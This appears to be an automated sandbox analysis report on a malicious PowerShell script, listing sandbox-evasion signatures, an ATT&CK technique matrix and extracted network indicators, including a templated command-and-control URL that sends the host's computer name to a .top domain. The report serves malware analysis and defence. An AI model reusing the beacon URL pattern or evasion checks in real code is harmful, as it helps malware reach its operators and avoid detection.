Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF848F502C5 rdtsc 0_2_00007FF848F502C5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6628Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3175Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1972Thread sleep time: -2767011611056431s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: powershell.exe, 00000000.00000002.2237767209.000001AE71D77000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IsVirtualMachineMSFT_MpComputerStatusMSFT_MpComputerStatus
Source: powershell.exe, 00000000.00000002.2195883968.000001AE00BDB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: IsVirtualMachineHI
Source: powershell.exe, 00000000.00000002.2237767209.000001AE71DDD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: powershell.exe, 00000000.00000002.2195883968.000001AE00C73000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMwareHI
Source: powershell.exe, 00000000.00000002.2195883968.000001AE00C73000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware8
Source: powershell.exe, 00000000.00000002.2237767209.000001AE71DDD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF848F502C5 rdtsc 0_2_00007FF848F502C5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Windows Management Instrumentation
1
DLL Side-Loading
1
Process Injection
121
Virtualization/Sandbox Evasion
OS Credential Dumping211
Security Software Discovery
Remote Services1
Archive Collected Data
1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
PowerShell
Boot or Logon Initialization Scripts1
DLL Side-Loading
1
Process Injection
LSASS Memory1
Process Discovery
Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Obfuscated Files or Information
Security Account Manager121
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
DLL Side-Loading
NTDS1
Application Window Discovery
Distributed Component Object ModelInput Capture12
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
File and Directory Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials11
System Information Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
download.ps13%ReversingLabs
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
www.google.com
172.217.19.228
truefalse
    high
    cmacnnkfbhlcncm.top
    45.61.136.138
    truefalse
      high
      NameMaliciousAntivirus DetectionReputation
      http://cmacnnkfbhlcncm.top/5jmw10tyqfhtr.php?id=user-PC&key=113750624201&s=527false
        unknown
        http://www.google.com/false
          high
          NameSourceMaliciousAntivirus DetectionReputation
          https://photos.google.com/?tab=wq&pageId=nonepowershell.exe, 00000000.00000002.2195883968.000001AE014E3000.00000004.00000800.00020000.00000000.sdmpfalse
            high
            http://www.google.com/preferences?hl=enXpowershell.exe, 00000000.00000002.2195883968.000001AE014E3000.00000004.00000800.00020000.00000000.sdmpfalse
              high
              https://csp.withgoogle.com/csp/gws/other-hppowershell.exe, 00000000.00000002.2195883968.000001AE00DF3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2222603419.000001AE101D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2222603419.000001AE10001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2195883968.000001AE00E21000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                https://contoso.com/Licensepowershell.exe, 00000000.00000002.2222603419.000001AE1006D000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  https://news.google.com/?tab=wnpowershell.exe, 00000000.00000002.2195883968.000001AE014E3000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    https://docs.google.com/document/?usp=docs_alcpowershell.exe, 00000000.00000002.2195883968.000001AE014E3000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      http://schema.org/WebPagepowershell.exe, 00000000.00000002.2195883968.000001AE00E21000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://0.google.com/powershell.exe, 00000000.00000002.2195883968.000001AE00E21000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://www.google.com/webhp?tab=wwpowershell.exe, 00000000.00000002.2195883968.000001AE014E3000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://www.google.com/url?q=https://blog.google/products/gemini/google-gemipowershell.exe, 00000000.00000002.2195883968.000001AE00E21000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://schema.org/WebPageXpowershell.exe, 00000000.00000002.2195883968.000001AE00E21000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://contoso.com/powershell.exe, 00000000.00000002.2222603419.000001AE1006D000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.2222603419.000001AE1006D000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://www.google.com/finance?tab=wepowershell.exe, 00000000.00000002.2195883968.000001AE014E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://www.google.com/logos/doodles/2024/year-inpowershell.exe, 00000000.00000002.2195883968.000001AE00E21000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://maps.google.com/maps?hl=en&tab=wlpowershell.exe, 00000000.00000002.2195883968.000001AE014E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://www.google.com/images/hpp/gemini-spark-icon-dark-mode-2-42px.pngpowershell.exe, 00000000.00000002.2195883968.000001AE00E21000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://www.google.compowershell.exe, 00000000.00000002.2195883968.000001AE014E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://www.google.com/images/hpp/gemini-spark-icon-dark-mode-2-42px.pngXpowershell.exe, 00000000.00000002.2195883968.000001AE014E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://apis.google.compowershell.exe, 00000000.00000002.2222603419.000001AE102F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2222603419.000001AE101FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2195883968.000001AE00DF3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2222603419.000001AE101D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2222603419.000001AE10001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2195883968.000001AE00FB3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2195883968.000001AE00E21000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://www.microsoft.cpowershell.exe, 00000000.00000002.2236363325.000001AE71C3C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.2195883968.000001AE00001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://www.blogger.com/?tab=wjpowershell.exe, 00000000.00000002.2195883968.000001AE014E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://www.google.com/mobile/?hl=en&tab=wDpowershell.exe, 00000000.00000002.2195883968.000001AE014E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://www.google.comppowershell.exe, 00000000.00000002.2195883968.000001AE00DDE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            unknown
                                                            https://play.google.com/?hl=en&tab=w8powershell.exe, 00000000.00000002.2195883968.000001AE014E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://www.google.com/url?q=https://blog.google/products/gemini/google-gemini-ai-holiday-planning-2powershell.exe, 00000000.00000002.2195883968.000001AE014E3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2222603419.000001AE10001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2195883968.000001AE00E21000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.2222603419.000001AE1006D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://www.google.com/imghp?hl=en&tab=wipowershell.exe, 00000000.00000002.2195883968.000001AE014E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://www.google.com/shopping?hl=en&source=og&tab=wfpowershell.exe, 00000000.00000002.2195883968.000001AE014E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://lh3.googleusercontent.com/ogw/default-user=s96powershell.exe, 00000000.00000002.2222603419.000001AE102F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2222603419.000001AE101FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2195883968.000001AE00DF3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2222603419.000001AE101D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2222603419.000001AE10001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2195883968.000001AE00E21000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000000.00000002.2195883968.000001AE00228000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000000.00000002.2195883968.000001AE00228000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://$a4j1wlqhkmzgpot67gw9l3qf0madz/$zs0pgc72wrmfea1.php?id=$env:computername&key=$frnyclkgbjpa&s=powershell.exe, 00000000.00000002.2195883968.000001AE00228000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              unknown
                                                                              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000000.00000002.2195883968.000001AE00228000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://go.micropowershell.exe, 00000000.00000002.2195883968.000001AE0226A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://drive.google.com/?tab=wopowershell.exe, 00000000.00000002.2195883968.000001AE014E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://contoso.com/Iconpowershell.exe, 00000000.00000002.2222603419.000001AE1006D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://0.googlepowershell.exe, 00000000.00000002.2195883968.000001AE00E21000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://www.microsoft.powershell.exe, 00000000.00000002.2236363325.000001AE71C3C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://cmacnnkfbhlcncm.toppowershell.exe, 00000000.00000002.2195883968.000001AE00C73000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            unknown
                                                                                            https://mail.google.com/mail/?tab=wmpowershell.exe, 00000000.00000002.2195883968.000001AE014E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://www.google.com/logos/doodles/2024/year-in-search-2024-global-6753651837110649-2xa.gifpowershell.exe, 00000000.00000002.2195883968.000001AE00E21000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://github.com/Pester/Pesterpowershell.exe, 00000000.00000002.2195883968.000001AE00228000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://www.youtube.com/?tab=w1powershell.exe, 00000000.00000002.2195883968.000001AE014E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://0.google.powershell.exe, 00000000.00000002.2195883968.000001AE00E21000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://lh3.googleusercontent.com/ogw/default-user=s96Xpowershell.exe, 00000000.00000002.2195883968.000001AE014E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://0.google.com/powershell.exe, 00000000.00000002.2195883968.000001AE00E21000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://lh3.googleusercontent.com/ogw/default-user=s24powershell.exe, 00000000.00000002.2195883968.000001AE00E21000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://www.google.com/history/optout?hl=enpowershell.exe, 00000000.00000002.2195883968.000001AE014E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://books.google.com/?hl=en&tab=wppowershell.exe, 00000000.00000002.2195883968.000001AE014E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://translate.google.com/?hl=en&tab=wTpowershell.exe, 00000000.00000002.2195883968.000001AE014E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000000.00000002.2195883968.000001AE00228000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://www.google.com/intl/en/about/products?tab=whXpowershell.exe, 00000000.00000002.2195883968.000001AE014E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://www.google.com/logos/doodles/2024/year-in-search-2024-global-6753651837110649-2xa.gifXpowershell.exe, 00000000.00000002.2195883968.000001AE00E21000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
